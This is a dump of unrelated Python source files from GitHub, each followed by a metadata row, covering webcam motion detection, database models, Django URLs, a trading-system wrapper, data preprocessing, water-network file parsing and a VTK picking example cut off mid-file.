threshFrame = cv2.dilate(threshFrame, None, iterations=2)
(cnts,_) = cv2.findContours(threshFrame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#if contour area >5000 put a rectangle around it and excecute rest
for contour in cnts:
if cv2.contourArea(contour) < 5000:
if contCStart == 1: #if first movement already detected
contourCount.append(0)
continue
status = 1
contCStart = 1
contourCount.append(cv2.contourArea(contour))
(x, y, w, h) = cv2.boundingRect(contour)
cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255,0), 3)
statusList.append(status)
statusList = statusList[-2:] #only keep track of part of list we need
#record time something exits/enters frame, and size on exit
if statusList[-1] == 1 and statusList[-2] == 0:
times.append(datetime.now())
if statusList[-1] == 0 and statusList[-2] == 1:
times.append(datetime.now())
times.append(cv2.contourArea(contour))
#showing gray, delta, black/white, and rectangle on orig
cv2.imshow("Capturing", gray)
cv2.imshow("Delta", delta)
cv2.imshow("Threshold", threshFrame)
cv2.imshow("Color Frame", frame)
key = cv2.waitKey(100)
if key == ord('q'):
if status == 1:
times.append(datetime.now())
times.append(cv2.contourArea(contour))
break
################# end while loop ###############
#add times to data frame
for i in range(0, len(times), 3):
df = df.append({"Start":times[i], "End":times[i+1], "ExitArea":times[i+2]}, ignore_index=True)
df.to_csv("Times.csv")
z = 0
x = 0
y = 0
count = 1
# averaging contours together to smooth graph
while x < len(contourCount):
while z < x+10:
if z < len(contourCount):
y = contourCount[z] + y
z = z + 1
count = count + 1
else:
z = x + 50
avgContour.append(float(int(y/count)^2)) #squared to accentuate changes
#avgContour.append((y/count))
y = 0
x = x + 10
z = z + 1
count = 1
i = 0
# count for x-axis on plot
while i < len(avgContour):
frameCount.append(i)
i = i + 1
video.release()
cv2.destroyAllWindows()
| Caseyar95/MotionDetectingWebcam | VideoCapture2.py | VideoCapture2.py | py | 3,169 | python | en | code | 0 | github-code | 36 |
9036950970 | from datetime import datetime
from sqlalchemy import Column, String, Integer, Float, DateTime, select, delete
from sqlalchemy.exc import IntegrityError, NoResultFound
from sqlalchemy.ext.asyncio import AsyncSession
from app.services.database import Base
class TokenInfo(Base):
__tablename__ = "TokenInfo"
created_at = Column(DateTime, primary_key=True)
symbol = Column(String, primary_key=True)
rank = Column(Integer, nullable=False)
price = Column(Float, nullable=True)
@classmethod
async def create(cls, db: AsyncSession, **kwargs):
transaction = cls(**kwargs)
db.add(transaction)
await db.commit()
await db.refresh(transaction)
return transaction
@classmethod
async def delete_timestamp(cls, db: AsyncSession, created_at: datetime):
transaction = delete(cls).where(
cls.created_at==created_at
).returning(cls.symbol, cls.created_at)
await db.execute(transaction)
await db.commit()
return transaction
@classmethod
async def get_tokens_by_date(cls, db: AsyncSession, dt: datetime):
return (await db.execute(
select(cls).filter_by(created_at=dt)
)).scalars().all()
| treybrooks/TopCryptosAPI | api/app/models.py | models.py | py | 1,243 | python | en | code | 0 | github-code | 36 |
11538129042 | """
Sandbox URL Configuration
"""
from django.conf import settings
from django.conf.urls import url
from django.views.generic.base import TemplateView
from sandbox.views import BasicSampleFormView, ModesSampleFormView
urlpatterns = [
# Dummy homepage to list demo views
url(r'^$', TemplateView.as_view(
template_name="homepage.html"
), name='home'),
# Sample with codemirror in the raw way
url(r'^raw/$', TemplateView.as_view(
template_name="raw.html"
), name='raw'),
# Basic form sample
url(r'^form/$', BasicSampleFormView.as_view(
template_name="form.html"
), name='form'),
# Mode index list
url(r'^modes/$', ModesSampleFormView.as_view(
template_name="modes.html"
), name='mode-index'),
# Basic form sample with specific mode
url(r'^modes/(?P<mode>[-\w]+)/$', ModesSampleFormView.as_view(
template_name="modes.html"
), name='basic'),
]
| sveetch/djangocodemirror | sandbox/urls.py | urls.py | py | 947 | python | en | code | 31 | github-code | 36 |
34699362669 | def cookbook_read():
with open('cookbook.txt') as file:
lines = file.readlines()
cook_book = {}
for num, line in enumerate(lines):
if line == '\n':
continue
elif num == 0 or lines[num-1] == '\n':
ingridients = []
for ingr in lines[num+2:num+2+int(lines[num+1])]:
ingr = ingr.split(' | ')
ingridients.append({'ingridient_name': ingr[0], 'quantity': int(ingr[1]), 'measure': ingr[2].strip()})
cook_book[line.strip()] = ingridients
del lines
return cook_book
# print('\n', 'Задание_1:', '\n', '\n', cookbook_read(), '\n', sep = '')
def get_shop_list_by_dishes(cook_book, person_count):
dishes = list(cook_book.keys())
ingridients_dict = {}
for dish in dishes:
if dish in list(cook_book.keys()):
for ingr in cook_book[dish]:
if ingr['ingridient_name'] not in list(ingridients_dict.keys()):
ingridients_dict[ingr['ingridient_name']] = {'measure': ingr['measure'],
'quantity': ingr['quantity'] * person_count}
else:
ingridients_dict[ingr['ingridient_name']]['quantity'] += ingr['quantity'] * person_count
return ingridients_dict
print('Задание_2:', '\n', '\n', get_shop_list_by_dishes(cookbook_read(), int(input('Введите кол-во персон: '))), sep='')
| sirifox/-2.1.files- | 2.1.files.py | 2.1.files.py | py | 1,382 | python | en | code | 0 | github-code | 36 |
361601527 | import pandas as pd
import glob
import functools
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
from sklearn import decomposition
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
#from plotnine import *
#from matplotlib.mlab import PCA
# LOAD THE DATA
#data = pd.read_csv('all.aa', sep='\t') #, header=None)
data = pd.concat(map(functools.partial(pd.read_csv, sep='\t', compression='gzip'), glob.glob("../data/aa/*")))
# STRIP OUT ONLY THE COUNTS
dat = data[list("ARNDCEQGHILKMFPSTWYV")]
# DIVIDE BY THE ROW SUMS TO GET THE FREQUENCY
dat_norm = dat.div(dat.sum(axis=1), axis=0)
# SCALE THE VALUES
dat_scaled = StandardScaler().fit_transform(dat_norm)
# CLASSIFY EACH ROW USING KMEANS
#clust = KMeans(n_clusters=2).fit(dat_scaled).labels_
# CALCULATE THE PRINCIPLE COMPONENTS
pca = decomposition.PCA(n_components = 2, svd_solver='full').fit(dat_scaled)
dat_pca = pca.transform(dat_scaled)
x_vector = pca.components_[0]
y_vector = pca.components_[1]
# PLOT
colors = {'noncoding':'#F2766E', 'coding':'#3CC9CF', True:'#3CC9CF', False:'#F2766E'}
df = pd.DataFrame({'X':dat_pca[:,0],'Y':dat_pca[:,1],'TYPE':data.TYPE})
fig, ax = plt.subplots()
ax.scatter(df['X'], df['Y'], c=df['TYPE'].apply(lambda x: colors[x]), marker='.', linewidths=0.0, alpha=0.1, zorder=5)
for i in range(len(x_vector)):
x = (1.2*x_vector[i]*max(dat_pca[:,0]))
y = (1.2*y_vector[i]*max(dat_pca[:,0]))
plt.arrow(0, 0, x, y, color='black', width=0.00005, zorder=10)
plt.text(x*1.1, y*1.1, dat.columns[i], color='black', zorder=10)
print("done")
blue_patch = mpatches.Patch(color='#3CC9CF', label='coding')
pink_patch = mpatches.Patch(color='#F2766E', label='non-coding')
# LEGEND
plt.legend(handles=[blue_patch,pink_patch])
ax.set_title('amino-acid frequency of potential ORFs from Lambda phage')
ax.set(xlabel='PC1', ylabel='PC2')
#plt.show()
fig.set_size_inches(20, 10)
fig.savefig('test.png', dpi=100)
| deprekate/goodorfs_experimental | scripts/pca_all.py | pca_all.py | py | 1,954 | python | en | code | 0 | github-code | 36 |
20324309262 | # -*- coding: utf-8 -*-
from django import forms
from bson.objectid import ObjectId
#from lib import get_db
class rich_form(forms.Form):
def as_read(self):
rt=''
for k,v in self.cleaned_data.iteritems():
rt+='<tr><td>'
rt+=str(self.field[k].label)
rt+='</td><td>'
if type(v)==list:
for ite in v:
rt+=str(ite)
else:
rt+=str(v)
rt+='</td></tr>'
def set_choices(self,fieldname,newlist):
self.fields[fieldname].choices=newlist
# class email_login(forms.Form):
# email=forms.EmailField(
# label=u'公司邮箱',
# strip=True,
# required=True,
# )
# password=forms.CharField(
# widget=forms.widgets.PasswordInput,
# label=u'密码',
# required=True,
# )
# department=forms.TypedChoiceField(
# label=u'部门',
# choices=[
# ['finance',u'财务部'],
# ['it',u'资讯科技部'],
# ],
# )
# taskname=forms.CharField(
# widget=forms.widgets.HiddenInput,
# )
# fileup=forms.FileField(
# label=u'文件',
# ) | raynardj/terminus | major/share/upgrade/forms.py | forms.py | py | 1,011 | python | en | code | 0 | github-code | 36 |
32033182710 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
@author:ai
@file:rootNet.py
@time:2020/06/01
"""
import traceback
import warnings
from collections import defaultdict
import arrow
import pandas as pd
from configs.riskConfig import FUTURE_ENDS
from tradingSystem import Order
from configs.Database import mysql, Database
from tradingSystem.rootNet.RootNetTrading import RootNetTrading
from tradingSystem.CATS.catsserverapi.catsConfig import futureEnds, CatsTypeTotradeAcct
from tradingSystem.CATS.catsserverapi.catsDictionary import CASH, TOTALASSET, POSITIONASSET
from utils.Date import getTradeSectionDates
strategyEnvToTradingEnv = {
'prod': 'prod',
'dev': 'test'
}
class rootNet():
def __init__(self, env='dev', mode='test', commit=True):
self.env = env
self.mode = mode
self.commit = commit
self.trade_date = str(arrow.now().date())
self.pre_trade_date = self.pre_date = getTradeSectionDates(self.trade_date, -2)[0]
self.tradingServer = RootNetTrading(env=mode)
self.userAcctInfo = defaultdict(dict)
self.accountToStrategyid = {} # 匹配账户与策略id
self.syst_id = 'rootNet'
self.security_type = {}
self.need_change_cash = 0
self.codesStorage = {'000001.SH', '000300.SH', '399001.SZ'}
self.tradeTypeToInt = {
'B': (1, 1), # 股票买入
'S': (-1, 1), # 股票卖出
'B/OPEN': (1, 1), # 开多仓
'S/OPEN': (1, -1), # 开空仓
'B/CLOSE': (-1, -1), # 平空仓
'S/CLOSE': (-1, 1) # 平多仓
}
def getPriceInfo(self, windcode):
return self.tradingServer.getStkInfo(windcode)
def login(self, acct_id, acct_pwd, opt_id, opt_pwd):
"""
:return:
"""
self.tradingServer.login(acctId=acct_id, acctPwd=acct_pwd,
optId=opt_id, optPwd=opt_pwd)
def close(self):
self.tradingServer.disconnect()
def getCashAndAssert(self):
"""
:return: {account:(cash,position_value,totalAsset)}
"""
result = {}
fundInfo = self.tradingServer.getFundInfo()
for account, info in fundInfo.items():
position_value = info.get('currentStkValue', 0)+info.get('marginUsedAmt', 0)
cash = info['usableAmt'] + info['tradeFrozenAmt']
totalAsset = cash + position_value
result[account] = (cash, position_value, totalAsset)
return result
def getAccountInfoByStrategyidsAndLogin(self, strategy_ids):
"""
根据策略id获取账户信息
"""
sql_user = "select sys_id,user_acct,user_acct_pwd from user_account"
with mysql(self.env) as cursor:
cursor.execute(sql_user)
data = cursor.fetchall()
for row in data:
self.userAcctInfo[row[0]]['user_acct'] = row[1]
self.userAcctInfo[row[0]]['user_acct_pwd'] = row[2]
self.strategids_str = str(strategy_ids).replace("[", "").replace("]", "").strip(",")
sql_cash = "select strategy_id,sys_id,acct_type,cats_acct_type,trade_acct,trade_acct_pwd from cash_account where strategy_id in ({})".format(
self.strategids_str)
with mysql(self.env, cursor_type='dict') as cursor:
cursor.execute(sql_cash)
data = cursor.fetchall()
for row in data:
if row['sys_id'] == 'rootNet':
self.tradingServer.login(acctId=row['trade_acct'],
acctPwd=row['trade_acct_pwd'],
optId=self.userAcctInfo[row['sys_id']]['user_acct'],
optPwd=self.userAcctInfo[row['sys_id']]['user_acct_pwd'],
acctType=row['acct_type'])
self.accountToStrategyid[row['trade_acct']] = row['strategy_id']
self.security_type[row['trade_acct']] = row['cats_acct_type']
else:
warnings.warn("not support sys_id:{} of strategy:{}".format(row['sys_id'], row['strategy_id']))
def _get_pre_sod_total_asset(self, strategy_id, trade_date, account_type):
with mysql(self.env) as cursor:
sql = "select total_asset from account where strategy_id = %s and trade_date = %s and account_type = %s"
cursor.execute(sql, (strategy_id, trade_date, account_type))
data = cursor.fetchall()
if data:
return data[0]
else:
return None
def getPosition(self, tradeAcct=''):
"""
:return:
"""
param = {'acct': [tradeAcct]} if tradeAcct else {}
positions = self.tradingServer.getPositions(where=param)
return positions
def getTrades(self, tradeAcct=''):
"""
:return:
"""
param = {'acct': [tradeAcct]} if tradeAcct else {}
trades = self.tradingServer.getTrades(where=param)
return trades
def store_position(self):
positions = self.getPosition()
if isinstance(positions, pd.DataFrame):
if positions.empty:
print("今日持仓为空!")
return
else:
if not positions:
print("今日持仓为空!")
return
positions['strategy_id'] = positions['ACCOUNT'].map(self.accountToStrategyid)
rows = []
for index, row in positions.iterrows():
rows.append((row['strategy_id'], self.trade_date, row["LS"], row['WIND_CODE'],
CatsTypeTotradeAcct[self.security_type[row['ACCOUNT']]],
row['POSITION'], row['AMOUNT']))
self.codesStorage.add(row['WIND_CODE'])
sql_insert = "insert into position (strategy_id,trade_date,LS,windcode,account_type,volume,amount) values (%s,%s,%s,%s,%s,%s,%s)"
self.saveToDb('position', sql_insert, rows)
def store_account(self):
accountInfo = self.getCashAndAssert()
print(accountInfo)
rows = []
for acct, info in accountInfo.items():
# (cash,position_value,totalAsset)}
cash, position_value, totalAsset = info
strategy_id = self.accountToStrategyid[acct]
sod_total_asset = self._get_pre_sod_total_asset(strategy_id, self.pre_date,
CatsTypeTotradeAcct[self.security_type[acct]])
if sod_total_asset == None:
sod_total_asset = totalAsset
rows.append(
(strategy_id, self.trade_date, CatsTypeTotradeAcct[self.security_type[acct]], position_value, cash,
totalAsset, sod_total_asset))
sql_insert = "insert into `account` (strategy_id,trade_date,account_type,position_value,cash,total_asset,sod_total_asset) " \
"values (%s,%s,%s,%s,%s,%s,%s)"
self.saveToDb('account', sql_insert, rows)
def store_today_trades(self, ):
trades = self.getTrades()
if isinstance(trades, pd.DataFrame):
if trades.empty:
print("今日无成交!")
return
else:
if not trades:
print("今日无成交!")
return
# ["WIND_CODE","SECURITY_CODE", "MARKET_TYPE", "SECURITY_NAME",
# "TRADE_TYPE", "TRADE_PRICE", "TRADE_VOLUME", "TRADE_AMOUNT"]]
trades = trades
rows = []
for index, row in trades.iterrows():
rows.append((self.trade_date, self.accountToStrategyid[row['ACCOUNT']], row['WIND_CODE'],
*self.tradeTypeToInt[row['TRADE_TYPE']],
row['TRADE_AMOUNT'], row['TRADE_VOLUME'], row['TRADE_PRICE']))
self.codesStorage.add(row['WIND_CODE'])
sql_insert = "insert into trade (trade_date,strategy_id,windcode,BS,LS,notional,volume,price) " \
"values (%s,%s,%s,%s,%s,%s,%s,%s)"
self.saveToDb('trade', sql_insert, rows)
def submitOrder(self, wind_code: str, tradeSide: str, targetVol: int, price: float):
"""
直接下单
:param wind_code:wind代码
:param tradeSide:买卖方向(B/S)
:param targetVol:目标量
:param price:委托价格
:return:
"""
order = Order(windCode=wind_code, orderType=tradeSide, orderQty=targetVol, orderPrice=price)
self.tradingServer.sendOrder({self.acct_id: [order]})
def cancelOrders(self, windcode=''):
"""
"""
data = self.tradingServer.getOriginalOrder()
cancelkeys = self.getCancelKeys(data, windcode)
self.tradingServer.cancelOrder(cancelkeys)
def getCancelKeys(self, df, windcode=''):
"""
通过条件获取原始订单信息,处理dataframe后返回acctid^^exchid^^contractNum 组成的id列表
:param where:筛选条件{}
:return:列表[id,...]
"""
if isinstance(df, pd.DataFrame):
if not df.empty:
df = df[df["CANCELABLE"] == 'Y']
if windcode:
df = df[df['WIND_CODE'] == windcode]
else:
if not df:
return []
ids = df.CANCEL_KEY.values
return ids
def getWindCodeAndMMF(self):
sql = "select attribute,value from strategy_static_configs where strategy_id = %s"
result = {}
with mysql(self.env) as cursor:
cursor.execute(sql, self.strategy_id)
data = cursor.fetchall()
if data:
for row in data:
result[row[0]] = row[1]
return result
def getPositionRatioOfMMF(self, windCode=''):
sql = "select target_ratio from target_position where strategy_id = %s and windcode = '%s'"
with mysql(self.env) as cursor:
cursor.execute(sql, (self.strategy_id, windCode))
data = cursor.fetchall()
if data:
return data[0]
else:
return 0
def storeClosePrice(self):
rows = []
closePrice = {}
for windCode in self.codesStorage:
stkInfo = self.tradingServer.getStkInfo(windCode)
if windCode.endswith(FUTURE_ENDS):
preSettlePrice = stkInfo.preSettlementPrice
preClosePrice = stkInfo.preClosePrice
else:
preSettlePrice = stkInfo.closePrice
preClosePrice = stkInfo.closePrice
pctchange = (stkInfo.newPrice - preSettlePrice) / preSettlePrice if preSettlePrice else 0
rows.append(
(self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt)
)
closePrice[windCode] = (
self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt,
preClosePrice)
return closePrice
def saveToDb(self,table, sql_insert, rows):
with mysql(self.env, commit=self.commit) as cursor:
try:
sql_delete = "delete from {} where trade_date = '{}' and strategy_id in ({})".format(table, self.trade_date, self.strategids_str)
cursor.execute(sql_delete)
cursor.executemany(sql_insert, rows)
except:
traceback.print_exc() | Joey2634/MultiFactorFramework | tradingSystem/CATS/catsserverapi/UseAITrading/rootNet.py | rootNet.py | py | 11,539 | python | en | code | 0 | github-code | 36 |
11538242087 | from PIL import Image, ImageDraw
cella = 75
def rect(x1, y1, x2, y2, col):
dib.polygon([(x1, y1), (x2, y1), (x2, y2), (x1, y2)], col)
def cercle(x, y, col):
dib.ellipse([cella*x + 25, cella*y + 25, cella*x + 49, cella*y + 49], col)
c = int(input())
f = int(input())
img = Image.new('RGB', (cella*c, cella*f), 'Beige')
dib = ImageDraw.Draw(img)
mat = []
for j in range(f):
fila = [0]*c
mat += [fila]
mat[0][0] = 1
cercle(0, 0, 'Black')
mat[f-1][c-1] = 1
cercle(c - 1, f - 1, 'Black')
n = int(input())
for r in range(n):
x = int(input()) - 1
y = int(input()) - 1
mat[y][x] = 1
cercle(x, y, 'Black')
x = 0
y = 0
color = ''
while color == '':
if x == c - 1 and y == f - 1:
color = 'Green'
elif x < c - 1 and mat[y][x+1]:
x += 1
elif y < f - 1 and mat[y+1][x]:
y += 1
else:
color = 'Red'
x = 0
y = 0
fi = False
while not fi:
cercle(x, y, color)
if x == c - 1 and y == f - 1:
fi = True
elif x < c - 1 and mat[y][x+1]:
rect(cella*x + cella//2, cella*y + 35, cella*x + 3*cella//2, cella*y + 39, color)
x += 1
elif y < f - 1 and mat[y+1][x]:
rect(cella*x + 35, cella*y + cella//2, cella*x + 39, cella*y + 3*cella//2, color)
y += 1
else:
fi = True
img.save("output.png") | oicatalana/solucions_oicat_2019 | concurs_classificatori2/pb6.py | pb6.py | py | 1,255 | python | en | code | 1 | github-code | 36 |
8265346084 | import csv
import os
import sys
from typing import List
from termcolor import colored
from tqdm import tqdm
from .binaryds import BinaryDs
MINIMUM_FEATURES: int = 32
csv.field_size_limit(sys.maxsize)
def run_preprocess(input_dir: List[str], category: int, output_dir: str,
openc: bool, features: int, balanced: bool,
seed: int, incomplete: bool) -> None:
"""
Performs the preprocessing by adding a category and writes (or updates) the
binary file containing the dataset on disk
:param input_dir The folder where the examples for a single category can be
found
:param category: The id of the category that will be written
:param output_dir: Path to the folder where the train.bin and test.bin
can be found (or will be created).
:param openc: True if this method has a function opcode encoding
:param features: How many features (i.e. The number of bytes for each
example)
:param balanced: True if the produced dataset should have the same
amount of training/testing/validate samples for each category
:param seed: The seed that will be used for shuffling
:param incomplete: True if the dataset won't be splitted, deduplicated
or shuffled
"""
assert (os.path.exists(output_dir))
train, validate, test = __load_all_into_train(output_dir, features, openc)
print("Reading and adding new files... ", flush=True)
files = gather_files(input_dir, openc)
read_and_add(train, files, category)
if incomplete:
print("Deduplicating... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Shuffling... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Balancing... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Splitting... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
else:
print("Deduplicating... ", end="", flush=True)
train.deduplicate()
print(colored("OK", "green", attrs=['bold']), flush=True)
print("Shuffling... ", end="", flush=True)
train.shuffle(seed)
print(colored("OK", "green", attrs=['bold']), flush=True)
print("Balancing... ", end="", flush=True)
if balanced:
train.balance()
print(colored("OK", "green", attrs=['bold']), flush=True)
else:
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Splitting... ", end="", flush=True)
train.split(validate, 0.5)
validate.split(test, 0.5)
print(colored("OK", "green", attrs=['bold']), flush=True)
print("Finalizing... ", end="", flush=True)
train.close()
validate.close()
test.close()
print(colored("OK", "green", attrs=['bold']), flush=True)
def __load_all_into_train(output_dir: str, features: int,
openc: bool) -> (BinaryDs, BinaryDs, BinaryDs):
# Load all the files into the train dataset
print("Loading old dataset... ", end="", flush=True)
path_train = os.path.join(output_dir, "train.bin")
path_val = os.path.join(output_dir, "validate.bin")
path_test = os.path.join(output_dir, "test.bin")
train = BinaryDs(path_train, features=features, encoded=openc).open()
test = BinaryDs(path_test, features=features, encoded=openc).open()
validate = BinaryDs(path_val, features=features, encoded=openc).open()
train.merge(test)
train.merge(validate)
print(colored("OK", "green", attrs=['bold']), flush=True)
return train, validate, test
def read_and_add(dataset: BinaryDs, files: List[str], category: int) -> None:
"""
Reads the raw files add them directly to the dataset as examples.
Functions/data with more bytes than the number of features will be split
into several chunks of features length.
If opcode encoding was chosen, chunks with less than MINIMUM_FEATURES bytes
(default 32) will be discarded, otherwise chunks with an amount of bytes
different than the number of features will be discarded.
:param files: List of paths to every file that will be processed.
:param dataset: dataset where the examples will be added.
:param category: The category for the current examples.
"""
buffer = []
for cur_file in tqdm(files, ncols=60):
data = list()
features = dataset.get_features()
openc = dataset.is_encoded()
if openc:
with open(cur_file, 'r') as f:
reader = csv.DictReader(f, delimiter=",", quotechar='"',
quoting=csv.QUOTE_NONNUMERIC)
for row in reader:
raw_data = row["opcodes"]
encoded_data = bytes.fromhex(raw_data)
data.append(encoded_data)
else:
with open(cur_file, 'rb') as f:
data.append(f.read())
# split in chunks of "features" length
chunked = []
for el in data:
chunks = [el[j:j + features] for j in range(0, len(el), features)]
chunked.extend(chunks)
if openc:
# prepad remaining elements and drop ones that are too short
padded = []
for element in chunked:
cur_len = len(element)
if cur_len >= MINIMUM_FEATURES:
missing = features - cur_len
padded.append(bytes(missing) + element)
chunked = padded
else:
# drop elements different from feature size
chunked = list(filter(lambda l: len(l) == features, chunked))
# append category and add to dataset
chunked = [(category, x) for x in chunked]
buffer.extend(chunked)
if len(buffer) > int(4194304 / (features + 1)):
# write only when a certain size is reached
dataset.write(buffer)
buffer = []
if len(buffer) > 0:
# write remaining
dataset.write(buffer)
def gather_files(paths: List[str], openc: bool) -> List[str]:
"""
Finds all files contained in a directory and filter them based on their
extensions.
:param paths: Paths to the folder containing the files or to a single file
:param openc: True if opcode based encoding is requested (will parse .csv
files, .bin otherwise)
:return A list of paths to every file contained in the folder with .csv
or .bin extension (based on the function parameter)
"""
files = []
for path in paths:
if os.path.isdir(path):
cur_files = []
for _, _, found in os.walk(path):
for cur_file in found:
cur_abs = os.path.join(path, cur_file)
cur_files.append(cur_abs)
else:
cur_files = [path]
if openc:
ext = ".csv"
else:
ext = ".bin"
cur_files = list(
filter(lambda x: os.path.splitext(x)[1] == ext, cur_files))
if len(cur_files) == 0:
raise FileNotFoundError(f"No files with the correct extension, "
"{ext} were found in the given folder")
else:
files.extend(cur_files)
return files
| inoueke-n/optimization-detector | src/preprocess.py | preprocess.py | py | 7,391 | python | en | code | 3 | github-code | 36 |
5561637675 | def longest_consecutive_subsequence(input_list):
input_list=sorted(input_list)
temp_start=-1
temp_end=-1
temp_count=1
start=-1
end=-1
count=1
for i in range(len(input_list)-1):
if temp_start==-1:
if input_list[i]-input_list[i+1] == -1 :
temp_start=i
temp_end=i+1
temp_count=temp_count+1
else:
if input_list[i]-input_list[i+1] == -1 :
temp_end=i+1
temp_count=temp_count+1
else:
if temp_count>count:
count=temp_count
start=temp_start
end=temp_end
temp_count=1
temp_start=-1
temp_end=-1
if start==-1 and end==-1:
start=temp_start
end=temp_end
return input_list[start:end+1]
def test_function(test_case):
output = longest_consecutive_subsequence(test_case[0])
if output == test_case[1]:
print("Pass")
else:
print("Fail")
test_case_1 = [[5, 4, 7, 10, 1, 3, 55, 2], [1, 2, 3, 4, 5]]
test_function(test_case_1)
test_case_2 = [[2, 12, 9, 16, 10, 5, 3, 20, 25, 11, 1, 8, 6 ], [8, 9, 10, 11, 12]]
test_function(test_case_2)
test_case_3 = [[0, 1, 2, 3, 4], [0, 1, 2, 3, 4]]
test_function(test_case_3)
| sripriya-potnuru/implementations-of-algorithms-and-datastructures | python/array/longest_consecutive_subsequence.py | longest_consecutive_subsequence.py | py | 1,101 | python | en | code | 0 | github-code | 36 |
26460686216 | # Read file from Big.inp
f = open('Big.inp', 'r')
node_file = open('big_node.txt', 'w')
edge_file = open('big_edge.txt', 'w')
pump_file = open('big_pump.txt', 'w')
read_format = ''
node_id = 0
edge_id = 0
pump_id = 0
source = []
outlet = []
node_map = {}
node_str = ''
edge_str = ''
curve_str = ''
edge_map = {}
for line in f:
if (line.isspace()):
read_format = ''
continue
if ('[JUNCTIONS]' in line):
read_format = 'node'
next(f)
continue
if ('[RESERVOIRS]' in line):
read_format = 'source'
next(f)
continue
if ('[TANKS]' in line):
read_format = 'tank'
next(f)
continue
if ('[PIPES]' in line):
read_format = 'pipe'
next(f)
continue
if ('[PUMPS]' in line):
read_format = 'pump'
next(f)
continue
if ('[VALVES]' in line):
read_format = 'valve'
next(f)
continue
# if ('[TAGS]' in line):
# break
if (';PUMP: PUMP:' in line):
pump_id += 1
read_format = 'pump_curve'
continue
if (read_format is 'node'):
node_id += 1
data = line.split()
id = data[0]
head = float(data[1])
demand = float(data[2])
node_map[id] = node_id
node_type = 0
if demand > 0:
outlet.append(node_id)
node_type = 1
node_str = '%d %f %f %d\n' % (node_id, demand, head, node_type)
node_file.write(node_str)
if (read_format is 'source'):
node_id += 1
data = line.split()
id = data[0]
head = float(data[1])
demand = -1
source.append(node_id)
node_map[id] = node_id
node_type = 2
node_str = '%d %f %f %d\n' % (node_id, demand, head, node_type)
node_file.write(node_str)
if (read_format is 'tank'):
node_id += 1
data = line.split()
id = data[0]
head = float(data[1])
node_map[id] = node_id
node_type = 3
node_str = '%d %f %f %d\n' % (node_id, 0, head, node_type)
node_file.write(node_str)
if (read_format is 'pipe'):
edge_id += 1
data = line.split()
node_1 = data[1]
node_2 = data[2]
edge_map[edge_id] = node_1 + "," + node_2
length = float(data[3])
diameter = float(data[4])
roughness = float(data[5])
edge_type = 0
edge_str = '%d %d %d %f %f %f %d\n' % (edge_id, node_map[node_1], node_map[node_2], length, diameter, roughness, edge_type)
edge_file.write(edge_str)
if (read_format is 'pump'):
edge_id += 1
data = line.split()
node_1 = data[1]
node_2 = data[2]
edge_map[edge_id] = node_1 + "," + node_2
length = 0.1
diameter = 250.0
roughness = 1.50
edge_type = 1
edge_str = '%d %d %d %f %f %f %d\n' % (edge_id, node_map[node_1], node_map[node_2], length, diameter, roughness, edge_type)
edge_file.write(edge_str)
if (read_format is 'valve'):
edge_id += 1
data = line.split()
node_1 = data[1]
node_2 = data[2]
edge_map[edge_id] = node_1 + "," + node_2
length = 0.1
diameter = float(data[3])
roughness = float(data[6])
edge_type = 2
edge_str = '%d %d %d %f %f %f %d\n' % (edge_id, node_map[node_1], node_map[node_2], length, diameter, roughness, edge_type)
edge_file.write(edge_str)
if (read_format is 'pump_curve'):
data = line.split()
pump_name = data[0].split(".")
if pump_name[0] in node_map:
head_name = node_map[pump_name[0]]
tail_name = node_map[pump_name[1]]
x_value = float(data[1])
y_value = float(data[2])
curve_str = '%d %d %d %f %f\n' % (pump_id,head_name,tail_name,x_value,y_value)
pump_file.write(curve_str)
pump_id_proxy = pump_id
# Write general info file
info = open('big.txt', 'w')
info.write('%d %d %d\n' % (node_id, edge_id, pump_id_proxy))
for item in source:
info.write('%d ' % (item))
info.write('\n')
for item in outlet:
info.write('%d ' % (item))
info.close()
node_file.close()
edge_file.close()
pump_file.close()
| MartinSuGJ/water_pipe | code/data_clean/water_instances_convert_new_new.py | water_instances_convert_new_new.py | py | 4,306 | python | en | code | 1 | github-code | 36 |
71578947943 | # !/usr/bin/env python
import vtk
def get_program_parameters():
import argparse
description = 'Highlighting a selected object with a silhouette.'
epilogue = '''
Click on the object to highlight it.
The selected object is highlighted with a silhouette.
'''
parser = argparse.ArgumentParser(description=description, epilog=epilogue,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('numberOfSpheres', nargs='?', type=int, default=10,
help='The number of spheres, default is 10.')
args = parser.parse_args()
return args.numberOfSpheres
class MouseInteractorHighLightActor(vtk.vtkInteractorStyleTrackballCamera):
def __init__(self, silhouette=None, silhouetteActor=None):
self.AddObserver("LeftButtonPressEvent", self.onLeftButtonDown)
self.LastPickedActor = None
self.Silhouette = silhouette
self.SilhouetteActor = silhouetteActor
def onLeftButtonDown(self, obj, event):
clickPos = self.GetInteractor().GetEventPosition()
# Pick from this location.
picker = vtk.vtkPropPicker()
picker.Pick(clickPos[0], clickPos[1], 0, self.GetDefaultRenderer())
self.LastPickedActor = picker.GetActor()
# If we picked something before, remove the silhouette actor and
# generate a new one.
if self.LastPickedActor:
self.GetDefaultRenderer().RemoveActor(self.SilhouetteActor)
# Highlight the picked actor by generating a silhouette
self.Silhouette.SetInputData(self.LastPickedActor.GetMapper().GetInput())
self.GetDefaultRenderer().AddActor(self.SilhouetteActor)
# Forward events
self.OnLeftButtonDown()
return
def SetSilhouette(self, silhouette):
self.Silhouette = silhouette
def SetSilhouetteActor(self, silhouetteActor):
self.SilhouetteActor = silhouetteActor
def main():
numberOfSpheres = get_program_parameters()
colors = vtk.vtkNamedColors()
# A renderer and render window
renderer = vtk.vtkRenderer()
renderer.SetBackground(colors.GetColor3d('SteelBlue'))
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetSize(640, 480)
renderWindow.AddRenderer(renderer)
# An interactor
